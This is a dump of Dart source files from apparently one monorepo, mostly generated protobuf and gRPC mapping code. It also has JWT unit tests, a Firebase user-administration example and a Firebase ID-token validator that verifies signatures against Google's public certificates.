map['secondaryApplianceType'] = instance.secondaryApplianceType?.index;
map['tags'] = instance.tags;
map['extraTags'] = instance.extraTags;
return map;
}
}
extension $RecipeMapExtension on Recipe {
Map<String, dynamic> toMap() => const $RecipeMapMapper().toMap(this);
static Recipe fromMap(Map<String, dynamic> map) =>
const $RecipeMapMapper().fromMap(map);
}
extension $MapRecipeExtension on Map<String, dynamic> {
Recipe toRecipe() => const $RecipeMapMapper().fromMap(this);
}
class $RecipeFieldNames {
final $kh = const MongoKeyHandler();
final String fieldName;
final String prefix;
$RecipeFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $RecipeFieldNames()
: fieldName = '',
prefix = '';
static const _key = 'key';
String get key => prefix + $kh.fieldNameToMapKey(_key);
static const _title = 'title';
String get title => prefix + _title;
static const _description = 'description';
String get description => prefix + _description;
static const _categoryKey = 'categoryKey';
String get categoryKey => prefix + $kh.fieldNameToMapKey(_categoryKey);
static const _secondaryCategoryKey = 'secondaryCategoryKey';
String get secondaryCategoryKey =>
prefix + $kh.fieldNameToMapKey(_secondaryCategoryKey);
static const _category = 'category';
$CategoryFieldNames get category =>
$CategoryFieldNames.sub(prefix + _category);
static const _ingredients = 'ingredients';
$IngredientFieldNames get ingredients =>
$IngredientFieldNames.sub(prefix + _ingredients);
static const _publishDate = 'publishDate';
String get publishDate => prefix + _publishDate;
static const _expiryDate = 'expiryDate';
String get expiryDate => prefix + _expiryDate;
static const _preparationDuration = 'preparationDuration';
String get preparationDuration => prefix + _preparationDuration;
static const _totalDuration = 'totalDuration';
String get totalDuration => prefix + _totalDuration;
static const _isPublished = 'isPublished';
String get isPublished => prefix + _isPublished;
static const _requiresRobot = 'requiresRobot';
String get requiresRobot => prefix + _requiresRobot;
static const _mainApplianceType = 'mainApplianceType';
String get mainApplianceType => prefix + _mainApplianceType;
static const _secondaryApplianceType = 'secondaryApplianceType';
String get secondaryApplianceType => prefix + _secondaryApplianceType;
static const _tags = 'tags';
String get tags => prefix + _tags;
static const _extraTags = 'extraTags';
String get extraTags => prefix + _extraTags;
@override
String toString() => fieldName;
}
<|start_filename|>squarealfa_security/test/security_test.dart<|end_filename|>
import 'dart:convert';
import 'package:squarealfa_security/squarealfa_security.dart';
import 'package:test/test.dart';
void main() {
var secret = '<KEY>';
group('Token generation', () {
var claims = JwtPayload(
name: '<NAME>',
email: '<EMAIL>',
subject: '5f35bd0489d72e2cd430f78d',
issuer: 'Our Server',
audience: 'Our Server',
notBefore: DateTime.now(),
tid: 'abc',
tenantId: '123',
expires: DateTime.now().add(Duration(seconds: 300)));
var tokenGenerator = JsonWebTokenHandler(secret);
var jwt = tokenGenerator.generate(claims);
test('token should have 3 parts', () {
var parts = jwt.split('.');
expect(parts.length, 3);
});
test('header type should be JWT', () {
var parts = jwt.split('.');
var header = utf8.decode(base64Decode(parts[0]));
var map = jsonDecode(header) as Map<String, dynamic>;
expect(map['typ'], 'JWT');
});
test('body should contain claims', () {
var parts = jwt.split('.');
var body = decodeB64Json(parts[1]);
var map = jsonDecode(body) as Map<String, dynamic>;
expect(map['name'], '<NAME>');
expect(map['email'], '<EMAIL>');
});
test('tenantId is correct', () {
var parts = jwt.split('.');
var body = decodeB64Json(parts[1]);
var map = jsonDecode(body) as Map<String, dynamic>;
expect(map['tenantId'], '123');
});
test('tid is correct', () {
var parts = jwt.split('.');
var body = decodeB64Json(parts[1]);
var map = jsonDecode(body) as Map<String, dynamic>;
expect(map['tid'], 'abc');
});
});
group('Token loading', () {
test('Subject is correct', () {
var tokenGenerator = JsonWebTokenHandler(secret);
var jwt =
'<KEY>';
var payload = tokenGenerator.load(jwt);
expect(payload.subject, '5f35bd0489d72e2cd430f78d');
});
test('Subject is correct', () {
var tokenGenerator = JsonWebTokenHandler(secret);
var jwt =
'<KEY>';
var payload = tokenGenerator.load(jwt);
expect(payload.subject, '5f35bd0489d72e2cd430f78d');
});
});
}
<|start_filename|>firebase-auth-admin/example/firebase_auth_admin_example.dart<|end_filename|>
import 'package:firebase_auth_admin/firebase_auth_admin.dart' as firebase;
void main() async {
// first we need to initialize the API
// this should always be one of the first
// calls in your main function, in
// your main isolate.
firebase.initialize('service-account.json');
// the following code creates a John Doe user:
final usr = firebase.FirebaseCreateUser(
info: firebase.FirebaseUserInfo(
email: '<EMAIL>',
displayName: '<NAME>',
password: '<PASSWORD>',
disabled: false,
emailVerified: true,
photoUrl: 'https://www.somewhere.com/myself.jpg',
),
);
// please note that this can be
  // called from any isolate (and there
  // is no need to call initialize again
  // from new isolates).
final uid = await firebase.createUser(usr);
// we can set custom claims to users.
// for example, we may want to add
// subscription expiration date on the
// user's account
await firebase.setCustomClaims(
uid,
{
'subscriptionExpiry':
DateTime.now().add(Duration(days: 365)).millisecondsSinceEpoch / 1000,
},
);
  // all other functions are just as easy to access;
  // we may even delete users (careful):
await firebase.deleteUser(uid);
}
<|start_filename|>grpc_host/example/demo_service.pb.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: demo_service.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:core' as $core;
import 'package:protobuf/protobuf.dart' as $pb;
class GPerson extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GPerson',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'key')
..aOS(
2,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'name')
..hasRequiredFields = false;
GPerson._() : super();
factory GPerson({
$core.String? key,
$core.String? name,
}) {
final _result = create();
if (key != null) {
_result.key = key;
}
if (name != null) {
_result.name = name;
}
return _result;
}
factory GPerson.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GPerson.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GPerson clone() => GPerson()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GPerson copyWith(void Function(GPerson) updates) =>
super.copyWith((message) => updates(message as GPerson))
as GPerson; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GPerson create() => GPerson._();
GPerson createEmptyInstance() => create();
static $pb.PbList<GPerson> createRepeated() => $pb.PbList<GPerson>();
@$core.pragma('dart2js:noInline')
static GPerson getDefault() =>
_defaultInstance ??= $pb.GeneratedMessage.$_defaultFor<GPerson>(create);
static GPerson? _defaultInstance;
@$pb.TagNumber(1)
$core.String get key => $_getSZ(0);
@$pb.TagNumber(1)
set key($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasKey() => $_has(0);
@$pb.TagNumber(1)
void clearKey() => clearField(1);
@$pb.TagNumber(2)
$core.String get name => $_getSZ(1);
@$pb.TagNumber(2)
set name($core.String v) {
$_setString(1, v);
}
@$pb.TagNumber(2)
$core.bool hasName() => $_has(1);
@$pb.TagNumber(2)
void clearName() => clearField(2);
}
class GPersonInsertResult extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GPersonInsertResult',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'key')
..hasRequiredFields = false;
GPersonInsertResult._() : super();
factory GPersonInsertResult({
$core.String? key,
}) {
final _result = create();
if (key != null) {
_result.key = key;
}
return _result;
}
factory GPersonInsertResult.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GPersonInsertResult.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GPersonInsertResult clone() => GPersonInsertResult()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GPersonInsertResult copyWith(void Function(GPersonInsertResult) updates) =>
super.copyWith((message) => updates(message as GPersonInsertResult))
as GPersonInsertResult; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GPersonInsertResult create() => GPersonInsertResult._();
GPersonInsertResult createEmptyInstance() => create();
static $pb.PbList<GPersonInsertResult> createRepeated() =>
$pb.PbList<GPersonInsertResult>();
@$core.pragma('dart2js:noInline')
static GPersonInsertResult getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GPersonInsertResult>(create);
static GPersonInsertResult? _defaultInstance;
@$pb.TagNumber(1)
$core.String get key => $_getSZ(0);
@$pb.TagNumber(1)
set key($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasKey() => $_has(0);
@$pb.TagNumber(1)
void clearKey() => clearField(1);
}
<|start_filename|>defaults_provider/test/lib/src/ingredient.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'ingredient.dart';
// **************************************************************************
// DefaultsProviderGenerator
// **************************************************************************
class $IngredientDefaultsProvider {
const $IngredientDefaultsProvider();
Ingredient createWithDefaults({
String? description,
double? quantity,
}) {
return Ingredient(
description: description ?? this.description,
quantity: quantity ?? this.quantity,
);
}
String get description => '';
double get quantity => 0;
}
<|start_filename|>proto_mapper/test/lib/src/appliance_type.dart<|end_filename|>
import 'package:proto_annotations/proto_annotations.dart';
import 'package:proto_generator_test/grpc/appliance_type.pbenum.dart';
part 'appliance_type.g.dart';
@proto
@mapProto
enum ApplianceType {
heat,
cold,
cutlery,
}
<|start_filename|>entity_adapter/example/lib/src/person.dart<|end_filename|>
import 'package:example/grpc/person.pb.dart';
import 'package:squarealfa_entity_adapter/squarealfa_entity_adapter.dart';
import 'asset.dart';
import 'entity.dart';
part 'person.g.dart';
@entity
class Person extends Entity {
final List<Asset> assets;
final String name;
Person({
required this.assets,
required this.name,
});
}
<|start_filename|>grpc_host/lib/grpc_host.dart<|end_filename|>
export 'src/configuration/configuration.dart';
export 'src/hosting/hosting.dart';
export 'src/security/security.dart';
export 'src/services/services.dart';
export 'src/containerization/containerization.dart';
<|start_filename|>squarealfa_security/lib/src/firebase_token_handler.dart<|end_filename|>
import 'dart:convert';
import 'package:jose/jose.dart';
import 'package:http/http.dart' as http;
import 'package:squarealfa_security/squarealfa_security.dart';
import 'invalid_signature_exception.dart';
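/// Validates Firebase ID tokens.
///
/// Downloads and caches Google's public signing certificates, verifies the
/// token signature with the `jose` package and maps the verified claims
/// into a [JwtPayload]. Throws an [InvalidSignatureException] when the
/// signature cannot be verified.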
class FirebaseTokenHandler {
static Future<JwtPayload> getJwtPayload(String idToken) async {
final _idToken =
idToken.startsWith('Bearer ') ? idToken.substring(7) : idToken;
final b64Header = _idToken.split('.')[0];
var jsonHeader = decodeB64Json(b64Header);
final map = jsonDecode(jsonHeader);
final keyId = map['kid'];
final ks = await _getKeyStore(keyId);
final jwt = await JsonWebToken.decodeAndVerify(_idToken, ks);
if (!(jwt.isVerified ?? false)) {
throw InvalidSignatureException();
}
final claims = jwt.claims;
final payload = JwtPayload(
audience: claims.audience?.first ?? '',
expires: claims.expiry ?? DateTime.now(),
issuer: claims.issuer?.toString() ?? '',
name: claims.getTyped('name') ?? '',
notBefore:
claims.notBefore ?? DateTime.now().subtract(Duration(seconds: 1)),
subject: claims.getTyped('sub'),
email: claims.getTyped('email'),
emailVerified: claims.getTyped('email_verified'),
tenantId: claims.getTyped('tenantId') ?? '',
tid: claims.getTyped('tid') ?? '',
permissions: claims.getTypedList<String>('scp') ?? const <String>[],
isAdministrator: claims.getTyped('adm') ?? false,
isVerified: true,
);
return payload;
}
}
var _keyStores = <String, JsonWebKeyStore>{};
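/// Returns the cached [JsonWebKeyStore] for [keyId], refreshing the
/// certificate cache first when the key id is not yet known.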
Future<JsonWebKeyStore> _getKeyStore(String keyId) async {
if (!_keyStores.containsKey(keyId)) {
await _updateKeyCache();
}
final key = _keyStores[keyId];
return key!;
}
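/// Downloads the current set of Google public certificates and rebuilds the
/// key-store cache, reusing the stores of key ids that are already cached.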
Future<void> _updateKeyCache() async {
final response = await http.get(Uri.parse(
'https://www.googleapis.com/robot/v1/metadata/x509/secure<EMAIL>'));
final rkeys = response.body;
final jKeys = jsonDecode(rkeys) as Map<String, dynamic>;
_keyStores = jKeys.map((kid, v) {
final existing = _keyStores[kid];
if (existing != null) {
return MapEntry<String, JsonWebKeyStore>(kid, existing);
}
final newKeyStore = JsonWebKeyStore()
..addKey(JsonWebKey.fromPem(v, keyId: kid));
return MapEntry<String, JsonWebKeyStore>(kid, newKeyStore);
});
}
<|start_filename|>proto_mapper/test/lib/src/recipe_services_base.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe_services_base.dart';
// **************************************************************************
// ProtoServicesServiceGenerator
// **************************************************************************
typedef RecipeServiceFactory = RecipeServiceBase Function(ServiceCall call);
class GRecipeService extends GRecipeServiceBase {
final RecipeServiceFactory $serviceFactory;
final void Function(ServiceCall call) $authenticator;
GRecipeService(
this.$serviceFactory,
this.$authenticator,
);
@override
void $onMetadata(ServiceCall context) {
$authenticator(context);
}
@override
Future<GRecipe> create(
ServiceCall call,
GRecipe request,
) async {
final service = $serviceFactory(call);
final entity = request.toRecipe();
final $result = await service.create(entity);
final proto = $result.toProto();
return proto;
}
@override
Future<GRecipe> update(
ServiceCall call,
GRecipe request,
) async {
final service = $serviceFactory(call);
final entity = request.toRecipe();
final $result = await service.update(entity);
final proto = $result.toProto();
return proto;
}
@override
Future<G_GRecipeService_Delete_Return> delete(
ServiceCall call,
GKey request,
) async {
final service = $serviceFactory(call);
final entity = request.toKey();
await service.delete(entity);
final proto = G_GRecipeService_Delete_Return();
return proto;
}
@override
Future<GRecipe> get(
ServiceCall call,
GKey request,
) async {
final service = $serviceFactory(call);
final entity = request.toKey();
final $result = await service.get(entity);
final proto = $result.toProto();
return proto;
}
@override
Future<GListOfRecipe> search(
ServiceCall call,
G_GRecipeService_Search_Parameters request,
) async {
final service = $serviceFactory(call);
final $result = await service.search();
final proto = GListOfRecipe()
..items.addAll($result.map((i) => i.toProto()));
return proto;
}
@override
Future<G_GRecipeService_SearchNullable_Return> searchNullable(
ServiceCall call,
G_GRecipeService_SearchNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.searchNullable();
final proto = G_GRecipeService_SearchNullable_Return();
proto.value
.addAll(value?.map((e) => const $RecipeProtoMapper().toProto(e)) ?? []);
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_InsertMany_Return> insertMany(
ServiceCall call,
GListOfRecipe request,
) async {
final service = $serviceFactory(call);
final entity = request.items.map((i) => i.toRecipe()).toList();
await service.insertMany(entity);
final proto = G_GRecipeService_InsertMany_Return();
return proto;
}
@override
Future<G_GRecipeService_GetNullable_Return> getNullable(
ServiceCall call,
G_GRecipeService_GetNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getNullable();
final proto = G_GRecipeService_GetNullable_Return();
if (value != null) {
proto.value = const $RecipeProtoMapper().toProto(value);
}
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_Count_Return> count(
ServiceCall call,
G_GRecipeService_Count_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.count();
final proto = G_GRecipeService_Count_Return();
proto.value = value;
return proto;
}
@override
Future<G_GRecipeService_CountNullable_Return> countNullable(
ServiceCall call,
G_GRecipeService_CountNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final p0 = request.returnNull;
final value = await service.countNullable(
p0,
);
final proto = G_GRecipeService_CountNullable_Return();
if (value != null) {
proto.value = value;
}
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_Reindex_Return> reindex(
ServiceCall call,
G_GRecipeService_Reindex_Parameters request,
) async {
final service = $serviceFactory(call);
await service.reindex();
final proto = G_GRecipeService_Reindex_Return();
return proto;
}
@override
Future<G_GRecipeService_GetMainRecipeType_Return> getMainRecipeType(
ServiceCall call,
G_GRecipeService_GetMainRecipeType_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getMainRecipeType();
final proto = G_GRecipeService_GetMainRecipeType_Return();
proto.value = GRecipeTypes.valueOf(value.index)!;
return proto;
}
@override
Future<G_GRecipeService_GetMainRecipeTypeNullable_Return>
getMainRecipeTypeNullable(
ServiceCall call,
G_GRecipeService_GetMainRecipeTypeNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getMainRecipeTypeNullable();
final proto = G_GRecipeService_GetMainRecipeTypeNullable_Return();
if (value != null) {
proto.value = GRecipeTypes.valueOf(value.index)!;
}
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_GetRecipeTypeList_Return> getRecipeTypeList(
ServiceCall call,
G_GRecipeService_GetRecipeTypeList_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getRecipeTypeList();
final proto = G_GRecipeService_GetRecipeTypeList_Return();
proto.value
.addAll(value.map((e) => const $RecipeTypesProtoMapper().toProto(e)));
return proto;
}
@override
Future<G_GRecipeService_GetRecipeTypeListNullable_Return>
getRecipeTypeListNullable(
ServiceCall call,
G_GRecipeService_GetRecipeTypeListNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getRecipeTypeListNullable();
final proto = G_GRecipeService_GetRecipeTypeListNullable_Return();
proto.value.addAll(
value?.map((e) => const $RecipeTypesProtoMapper().toProto(e)) ?? []);
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_GetListOfInts_Return> getListOfInts(
ServiceCall call,
G_GRecipeService_GetListOfInts_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getListOfInts();
final proto = G_GRecipeService_GetListOfInts_Return();
proto.value.addAll(value);
return proto;
}
@override
Future<G_GRecipeService_GetListOfIntsNullable_Return> getListOfIntsNullable(
ServiceCall call,
G_GRecipeService_GetListOfIntsNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getListOfIntsNullable();
final proto = G_GRecipeService_GetListOfIntsNullable_Return();
proto.value.addAll(value ?? []);
proto.valueHasValue = value != null;
return proto;
}
@override
Future<GCalcResult> doCalculation(
ServiceCall call,
GCalcParameters request,
) async {
final service = $serviceFactory(call);
final entity = request.toCalcParameters();
final $result = await service.doCalculation(entity);
final proto = $result.toProto();
return proto;
}
@override
Future<G_GRecipeService_ReceiveLotsOfArgs_Return> receiveLotsOfArgs(
ServiceCall call,
G_GRecipeService_ReceiveLotsOfArgs_Parameters request,
) async {
final service = $serviceFactory(call);
final p0 = request.pString;
final p1 = request.pInt;
final p2 = RecipeTypes.values[request.pRecipeTypes.value];
final p3 = const $RecipeProtoMapper().fromProto(request.pRecipe);
final p4 = List<String>.unmodifiable(request.pListStrings.map((e) => e));
final p5 = List<int>.unmodifiable(request.pListInts.map((e) => e));
final p6 = List<RecipeTypes>.unmodifiable(request.pListRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e)));
final p7 = List<Recipe>.unmodifiable(request.pListRecipes
.map((e) => const $RecipeProtoMapper().fromProto(e)));
final p8 = Set<String>.unmodifiable(request.pSetString.map((e) => e));
final p9 = Set<int>.unmodifiable(request.pSetInt.map((e) => e));
final p10 = Set<RecipeTypes>.unmodifiable(request.pSetRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e)));
final p11 = Set<Recipe>.unmodifiable(
request.pSetRecipe.map((e) => const $RecipeProtoMapper().fromProto(e)));
final p12 =
List<String>.unmodifiable(request.pIterableString.map((e) => e));
final p13 = List<int>.unmodifiable(request.pIterableInt.map((e) => e));
final p14 = List<RecipeTypes>.unmodifiable(request.pIterableRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e)));
final p15 = List<Recipe>.unmodifiable(request.pIterableRecipe
.map((e) => const $RecipeProtoMapper().fromProto(e)));
await service.receiveLotsOfArgs(
p0,
p1,
p2,
p3,
p4,
p5,
p6,
p7,
p8,
p9,
p10,
p11,
p12,
p13,
p14,
p15,
);
final proto = G_GRecipeService_ReceiveLotsOfArgs_Return();
return proto;
}
@override
Future<G_GRecipeService_ReceiveLotsOfNullableArgs_Return>
receiveLotsOfNullableArgs(
ServiceCall call,
G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters request,
) async {
final service = $serviceFactory(call);
final p0 = (request.pStringHasValue ? (request.pString) : null);
final p1 = (request.pIntHasValue ? (request.pInt) : null);
final p2 = (request.pRecipeTypesHasValue
? (RecipeTypes.values[request.pRecipeTypes.value])
: null);
final p3 = (request.pRecipeHasValue
? (const $RecipeProtoMapper().fromProto(request.pRecipe))
: null);
final p4 = (request.pListStringsHasValue
? (List<String>.unmodifiable(request.pListStrings.map((e) => e)))
: null);
final p5 = (request.pListIntsHasValue
? (List<int>.unmodifiable(request.pListInts.map((e) => e)))
: null);
final p6 = (request.pListRecipeTypesHasValue
? (List<RecipeTypes>.unmodifiable(request.pListRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e))))
: null);
final p7 = (request.pListRecipesHasValue
? (List<Recipe>.unmodifiable(request.pListRecipes
.map((e) => const $RecipeProtoMapper().fromProto(e))))
: null);
final p8 = (request.pSetStringHasValue
? (Set<String>.unmodifiable(request.pSetString.map((e) => e)))
: null);
final p9 = (request.pSetIntHasValue
? (Set<int>.unmodifiable(request.pSetInt.map((e) => e)))
: null);
final p10 = (request.pSetRecipeTypesHasValue
? (Set<RecipeTypes>.unmodifiable(request.pSetRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e))))
: null);
final p11 = (request.pSetRecipeHasValue
? (Set<Recipe>.unmodifiable(request.pSetRecipe
.map((e) => const $RecipeProtoMapper().fromProto(e))))
: null);
final p12 = (request.pIterableStringHasValue
? (List<String>.unmodifiable(request.pIterableString.map((e) => e)))
: null);
final p13 = (request.pIterableIntHasValue
? (List<int>.unmodifiable(request.pIterableInt.map((e) => e)))
: null);
final p14 = (request.pIterableRecipeTypesHasValue
? (List<RecipeTypes>.unmodifiable(request.pIterableRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e))))
: null);
final p15 = (request.pIterableRecipeHasValue
? (List<Recipe>.unmodifiable(request.pIterableRecipe
.map((e) => const $RecipeProtoMapper().fromProto(e))))
: null);
final value = await service.receiveLotsOfNullableArgs(
p0,
p1,
p2,
p3,
p4,
p5,
p6,
p7,
p8,
p9,
p10,
p11,
p12,
p13,
p14,
p15,
);
final proto = G_GRecipeService_ReceiveLotsOfNullableArgs_Return();
proto.value.addAll(value);
return proto;
}
}
// **************************************************************************
// ProtoServicesClientGenerator
// **************************************************************************
abstract class RecipeServiceClientBase implements RecipeServiceBase {
Future<GRecipeServiceClient> getGServiceClient();
@override
Future<Recipe> create(
Recipe entity,
) async {
final serviceClient = await getGServiceClient();
final $parm = entity.toProto();
final $result = await serviceClient.create($parm);
final $ret = $result.toRecipe();
return $ret;
}
@override
Future<Recipe> update(
Recipe entity,
) async {
final serviceClient = await getGServiceClient();
final $parm = entity.toProto();
final $result = await serviceClient.update($parm);
final $ret = $result.toRecipe();
return $ret;
}
@override
Future<void> delete(
Key key,
) async {
final serviceClient = await getGServiceClient();
final $parm = key.toProto();
await serviceClient.delete($parm);
}
@override
Future<Recipe> get(
Key key,
) async {
final serviceClient = await getGServiceClient();
final $parm = key.toProto();
final $result = await serviceClient.get($parm);
final $ret = $result.toRecipe();
return $ret;
}
@override
Future<List<Recipe>> search() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_Search_Parameters();
final $result = await serviceClient.search($parm);
final $ret = $result.items.map((i) => i.toRecipe()).toList();
return $ret;
}
@override
Future<List<Recipe>?> searchNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_SearchNullable_Parameters();
final $result = await serviceClient.searchNullable($parm);
final $ret = ($result.valueHasValue
? (List<Recipe>.unmodifiable(
$result.value.map((e) => const $RecipeProtoMapper().fromProto(e))))
: null);
return $ret;
}
@override
Future<void> insertMany(
List<Recipe> recipes,
) async {
final serviceClient = await getGServiceClient();
final $parm = GListOfRecipe(items: recipes.map((i) => i.toProto()));
await serviceClient.insertMany($parm);
}
@override
Future<Recipe?> getNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetNullable_Parameters();
final $result = await serviceClient.getNullable($parm);
final $ret = ($result.valueHasValue
? (const $RecipeProtoMapper().fromProto($result.value))
: null);
return $ret;
}
@override
Future<int> count() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_Count_Parameters();
final $result = await serviceClient.count($parm);
final $ret = $result.value;
return $ret;
}
@override
Future<int?> countNullable(
bool returnNull,
) async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_CountNullable_Parameters();
$parm.returnNull = returnNull;
final $result = await serviceClient.countNullable($parm);
final $ret = ($result.valueHasValue ? ($result.value) : null);
return $ret;
}
@override
Future<void> reindex() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_Reindex_Parameters();
await serviceClient.reindex($parm);
}
@override
Future<RecipeTypes> getMainRecipeType() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetMainRecipeType_Parameters();
final $result = await serviceClient.getMainRecipeType($parm);
final $ret = RecipeTypes.values[$result.value.value];
return $ret;
}
@override
Future<RecipeTypes?> getMainRecipeTypeNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetMainRecipeTypeNullable_Parameters();
final $result = await serviceClient.getMainRecipeTypeNullable($parm);
final $ret = ($result.valueHasValue
? (RecipeTypes.values[$result.value.value])
: null);
return $ret;
}
@override
Future<List<RecipeTypes>> getRecipeTypeList() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetRecipeTypeList_Parameters();
final $result = await serviceClient.getRecipeTypeList($parm);
final $ret = List<RecipeTypes>.unmodifiable(
$result.value.map((e) => const $RecipeTypesProtoMapper().fromProto(e)));
return $ret;
}
@override
Future<List<RecipeTypes>?> getRecipeTypeListNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetRecipeTypeListNullable_Parameters();
final $result = await serviceClient.getRecipeTypeListNullable($parm);
final $ret = ($result.valueHasValue
? (List<RecipeTypes>.unmodifiable($result.value
.map((e) => const $RecipeTypesProtoMapper().fromProto(e))))
: null);
return $ret;
}
@override
Future<List<int>> getListOfInts() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetListOfInts_Parameters();
final $result = await serviceClient.getListOfInts($parm);
final $ret = List<int>.unmodifiable($result.value.map((e) => e));
return $ret;
}
@override
Future<List<int>?> getListOfIntsNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetListOfIntsNullable_Parameters();
final $result = await serviceClient.getListOfIntsNullable($parm);
final $ret = ($result.valueHasValue
? (List<int>.unmodifiable($result.value.map((e) => e)))
: null);
return $ret;
}
@override
Future<CalcResult> doCalculation(
CalcParameters parameters,
) async {
final serviceClient = await getGServiceClient();
final $parm = parameters.toProto();
final $result = await serviceClient.doCalculation($parm);
final $ret = $result.toCalcResult();
return $ret;
}
@override
Future<void> receiveLotsOfArgs(
String pString,
int pInt,
RecipeTypes pRecipeTypes,
Recipe pRecipe,
List<String> pListStrings,
List<int> pListInts,
List<RecipeTypes> pListRecipeTypes,
List<Recipe> pListRecipes,
Set<String> pSetString,
Set<int> pSetInt,
Set<RecipeTypes> pSetRecipeTypes,
Set<Recipe> pSetRecipe,
Iterable<String> pIterableString,
Iterable<int> pIterableInt,
Iterable<RecipeTypes> pIterableRecipeTypes,
Iterable<Recipe> pIterableRecipe,
) async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_ReceiveLotsOfArgs_Parameters();
$parm.pString = pString;
$parm.pInt = pInt;
$parm.pRecipeTypes = GRecipeTypes.valueOf(pRecipeTypes.index)!;
$parm.pRecipe = const $RecipeProtoMapper().toProto(pRecipe);
$parm.pListStrings.addAll(pListStrings);
$parm.pListInts.addAll(pListInts);
$parm.pListRecipeTypes.addAll(pListRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().toProto(e)));
$parm.pListRecipes
.addAll(pListRecipes.map((e) => const $RecipeProtoMapper().toProto(e)));
$parm.pSetString.addAll(pSetString);
$parm.pSetInt.addAll(pSetInt);
$parm.pSetRecipeTypes.addAll(
pSetRecipeTypes.map((e) => const $RecipeTypesProtoMapper().toProto(e)));
$parm.pSetRecipe
.addAll(pSetRecipe.map((e) => const $RecipeProtoMapper().toProto(e)));
$parm.pIterableString.addAll(pIterableString);
$parm.pIterableInt.addAll(pIterableInt);
$parm.pIterableRecipeTypes.addAll(pIterableRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().toProto(e)));
$parm.pIterableRecipe.addAll(
pIterableRecipe.map((e) => const $RecipeProtoMapper().toProto(e)));
await serviceClient.receiveLotsOfArgs($parm);
}
@override
Future<List<int>> receiveLotsOfNullableArgs(
String? pString,
int? pInt,
